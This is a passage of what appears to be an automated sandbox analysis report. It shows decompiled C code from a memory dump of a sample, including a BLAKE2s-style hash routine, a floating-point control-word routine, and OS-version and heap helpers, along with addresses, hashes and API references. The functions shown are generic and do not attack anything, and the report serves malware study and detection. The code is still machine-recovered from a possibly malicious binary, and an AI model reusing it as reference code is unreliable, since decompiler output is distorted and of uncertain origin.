							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00bd0fe2
0x00bd0fe9
0x00bd0fee
0x00bd0ff4
0x00bd0ff7
0x00bd0ffd
0x00bd1002
0x00bd1007
0x00bd1007
0x00bd100d
0x00bd1012
0x00bd1017
0x00bd1017
0x00bd101e
0x00bd1023
0x00bd1028
0x00bd1028
0x00bd102f
0x00bd1034
0x00bd1039
0x00bd1039
0x00bd1040
0x00bd1045
0x00bd104a
0x00bd104a
0x00bd1052
0x00bd1062
0x00bd1074
0x00bd1086
0x00bd1099
0x00bd10ab
0x00bd10b3
0x00bd10b8
0x00bd10bd
0x00bd10bd
0x00bd10c4
0x00bd10c9
0x00bd10c9
0x00bd10d0
0x00bd10d5
0x00bd10d5
0x00bd10dc
0x00bd10e1
0x00bd10e1
0x00bd10e8
0x00bd10ed
0x00bd10ed
0x00bd10f7
0x00bd10f9
0x00bd1133
0x00bd10fb
0x00bd1100
0x00bd1124
0x00bd112c
0x00bd1120
0x00bd1120
0x00bd1136
0x00bd113d
0x00bd113f
0x00bd1161
0x00bd1169
0x00bd116c
0x00bd116c
0x00bd116e
0x00bd116e
0x00bd1179
0x00bd117f
0x00bd1184
0x00bd118b
0x00bd11c5
0x00bd11d0
0x00bd11d6
0x00bd11d9
0x00bd11dc
0x00bd11e8
0x00bd11f0
0x00bd118d
0x00bd1190
0x00bd119c
0x00bd11a2
0x00bd11a8
0x00bd11ab
0x00bd11b4
0x00bd11b4
0x00bd11f3
0x00bd1201
0x00bd1207
0x00bd120e
0x00bd1210
0x00bd1210
0x00bd1217
0x00bd1219
0x00bd1219
0x00bd1220
0x00bd1222
0x00bd1222
0x00bd1229
0x00bd122b
0x00bd122b
0x00bd1232
0x00bd1234
0x00bd1234
0x00bd1241
0x00bd1244
0x00bd127b
0x00bd1246
0x00bd1246
0x00bd1249
0x00bd1274
0x00bd1269
0x00bd1269
0x00bd127d
0x00bd1285
0x00bd1288
0x00bd12a7
0x00bd12ac
0x00bd12ac
0x00bd12ae
0x00bd12b3
0x00bd12bf
0x00bd12b5
0x00bd12b8
0x00bd12b8
0x00bd12c4
0x00bd12c4
0x00bd128a
0x00bd128d
0x00bd129c
0x00000000
0x00bd129c
0x00bd128f
0x00bd1292
0x00bd1294
0x00bd1294
0x00000000
0x00bd1292
0x00bd124b
0x00bd124e
0x00bd1264
0x00000000
0x00bd1264
0x00bd1253
0x00bd1255
0x00bd1255
0x00bd1253
0x00000000
0x00bd1244
0x00bd1146
0x00bd1154
0x00bd115c
0x00000000
0x00bd115c
0x00bd114a
0x00bd114f
0x00bd114f
0x00000000
0x00bd114a
0x00bd1107
0x00bd1115
0x00bd111d
0x00000000
0x00bd111d
0x00bd110b
0x00bd1110
0x00bd1110
0x00bd110b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD0FCF,?,?,00000008,?,?,00BD0C6F,00000000), ref: 00BD1201

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: aca34025ae189b0003941cf8cfe9ad68b8e4e4e120da59ce3f69d73d39a09b9b
Instruction ID: 50c7f6f664a929384e4f86dbb577eb7717f807126c2e87e185283de863c8fa6d
Opcode Fuzzy Hash: aca34025ae189b0003941cf8cfe9ad68b8e4e4e120da59ce3f69d73d39a09b9b
Instruction Fuzzy Hash: 08B14931610608AFD715CF2CC486B65BBE0FF45364F258A99E999CF3A1D336E992CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00BA404E Relevance: 1.6, Strings: 1, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00BA404E() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0xbd2680; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0xbd2681; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xbd2682; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0xbd2683; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xbd2684; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0xbd2685; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0xbd2686; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0xbd2687; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0xbd2688; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0xbd2689; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0xbd268a; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0xbd268b; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0xbd268c; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0xbd268d; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0xbd268e; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0xbd268f; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

0x00ba4054
0x00ba406e
0x00ba4076
0x00ba407e
0x00ba407e
0x00ba408a
0x00ba408d
0x00ba408d
0x00ba4099
0x00ba409f
0x00ba40a5
0x00ba40ab
0x00ba40af
0x00ba40b8
0x00ba40c1
0x00ba40c7
0x00ba40d0
0x00ba40da
0x00ba40e2
0x00ba40ea
0x00ba40f2
0x00ba40fa
0x00ba4102
0x00ba4106
0x00ba410a
0x00ba410e
0x00ba4112
0x00ba4116
0x00ba411e
0x00ba4122
0x00ba4126
0x00ba4126
0x00ba413a
0x00ba4140
0x00ba4144
0x00ba414a
0x00ba414d
0x00ba414f
0x00ba4151
0x00ba4155
0x00ba4159
0x00ba415c
0x00ba4160
0x00ba4174
0x00ba417a
0x00ba417e
0x00ba4184
0x00ba4187
0x00ba418b
0x00ba418f
0x00ba4192
0x00ba419e
0x00ba41b0
0x00ba41b6
0x00ba41ba
0x00ba41c0
0x00ba41c3
0x00ba41c5
0x00ba41c7
0x00ba41cb
0x00ba41cf
0x00ba41d2
0x00ba41d6
0x00ba41ea
0x00ba41f0
0x00ba41f4
0x00ba41fa
0x00ba41fd
0x00ba4201
0x00ba4205
0x00ba4208
0x00ba4210
0x00ba4224
0x00ba422c
0x00ba4232
0x00ba4235
0x00ba4237
0x00ba4239
0x00ba423d
0x00ba4241
0x00ba4244
0x00ba4254
0x00ba425a
0x00ba425e
0x00ba4264
0x00ba4267
0x00ba426b
0x00ba426f
0x00ba4272
0x00ba4276
0x00ba427a
0x00ba428c
0x00ba4292
0x00ba4296
0x00ba429c
0x00ba429f
0x00ba42a1
0x00ba42a3
0x00ba42a7
0x00ba42b2
0x00ba42be
0x00ba42c4
0x00ba42c8
0x00ba42ce
0x00ba42d1
0x00ba42d5
0x00ba42d9
0x00ba42dc
0x00ba42e0
0x00ba42e4
0x00ba42f6
0x00ba42fc
0x00ba4300
0x00ba4306
0x00ba4309
0x00ba430b
0x00ba430d
0x00ba4311
0x00ba431c
0x00ba4328
0x00ba432e
0x00ba4332
0x00ba4336
0x00ba433c
0x00ba433f
0x00ba4341
0x00ba4343
0x00ba4347
0x00ba434b
0x00ba434f
0x00ba4352
0x00ba4356
0x00ba435a
0x00ba4361
0x00ba436e
0x00ba4370
0x00ba4374
0x00ba437e
0x00ba4381
0x00ba4383
0x00ba4385
0x00ba4389
0x00ba438d
0x00ba4390
0x00ba43a0
0x00ba43a6
0x00ba43aa
0x00ba43ae
0x00ba43b4
0x00ba43b7
0x00ba43b9
0x00ba43bb
0x00ba43bf
0x00ba43c3
0x00ba43c7
0x00ba43ca
0x00ba43ce
0x00ba43d2
0x00ba43d9
0x00ba43e6
0x00ba43ec
0x00ba43f0
0x00ba43f6
0x00ba43f9
0x00ba43fb
0x00ba43fd
0x00ba4401
0x00ba4405
0x00ba4408
0x00ba4418
0x00ba441e
0x00ba4422
0x00ba4426
0x00ba442c
0x00ba442f
0x00ba4431
0x00ba4433
0x00ba4437
0x00ba443a
0x00ba443e
0x00ba4442
0x00ba4446
0x00ba444a
0x00ba445c
0x00ba4462
0x00ba4466
0x00ba446c
0x00ba446f
0x00ba4471
0x00ba4473
0x00ba4477
0x00ba4482
0x00ba448e
0x00ba4490
0x00ba4494
0x00ba4498
0x00ba449a
0x00ba44a1
0x00ba44a3
0x00ba44a5
0x00ba44a9
0x00ba44b1
0x00ba44b4
0x00ba44b7
0x00ba44bb
0x00ba44bf
0x00ba44c3
0x00ba44c7
0x00ba44cb
0x00ba44d6
0x00ba44dd
0x00ba44e4
0x00ba44eb
0x00ba44ef
0x00ba44f3
0x00ba44fa
0x00ba44fa
0x00ba4507
0x00ba450b
0x00ba450e
0x00ba4511
0x00ba4520

Strings

gj, xrefs: 00BA4091

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 10d2a2228ab7da31eebd689d8b4d4b16407ba2a224aeb1b3efdb8b9de9de4829
Instruction ID: 679c2e698361039339f2bd8e3c7b630be0a80971cf1da35365082a76bb69a601
Opcode Fuzzy Hash: 10d2a2228ab7da31eebd689d8b4d4b16407ba2a224aeb1b3efdb8b9de9de4829
Instruction Fuzzy Hash: 3BF1D3B1A083818FC748CF29D880A1AFBE1BFC8308F15896EF498D7751E734E9558B56

Uniqueness

Uniqueness Score: -1.00%

Function 00BAAC35 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAAC35() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xbdd020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xbdff60; // 0xa
					_t13 =  *0xbdff64; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xbdd020 = _t12;
					 *0xbdff60 = _t6;
					 *0xbdff64 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x00baac38
0x00baac47
0x00baac85
0x00baac8a
0x00baac49
0x00baac4f
0x00baac5a
0x00baac60
0x00baac66
0x00baac6c
0x00baac72
0x00baac78
0x00baac7d
0x00baac7d
0x00baac93
0x00000000
0x00baac95
0x00000000
0x00baac98

APIs

GetVersionExW.KERNEL32(?), ref: 00BAAC5A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 46df6be5fde12fca91faaf040be7a998fb819050c4ff69bdf2931aab0d8f6729
Instruction ID: 9778052e3cb1d88399b8e0268ad4dc648b928440798c46c3a28de68bda848506
Opcode Fuzzy Hash: 46df6be5fde12fca91faaf040be7a998fb819050c4ff69bdf2931aab0d8f6729
Instruction Fuzzy Hash: AAF01DB090A20C8BD718DB58EDA16E9B7A5F79A310F2042AAD91643350FB705940CE61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB610 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BCB610() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xc006e4 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00bcb610
0x00bcb618
0x00bcb620

APIs

GetProcessHeap.KERNEL32 ref: 00BCB610

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a3e097c6b582c6e52e7254ddf8368d51b21e51819b0a3b0b39a4aaa8125c5c39
Instruction ID: 51041e406166ffe93bdac6fa0e59e536760a3a57a3d13a45652ec1c38c5fd9d2
Opcode Fuzzy Hash: a3e097c6b582c6e52e7254ddf8368d51b21e51819b0a3b0b39a4aaa8125c5c39
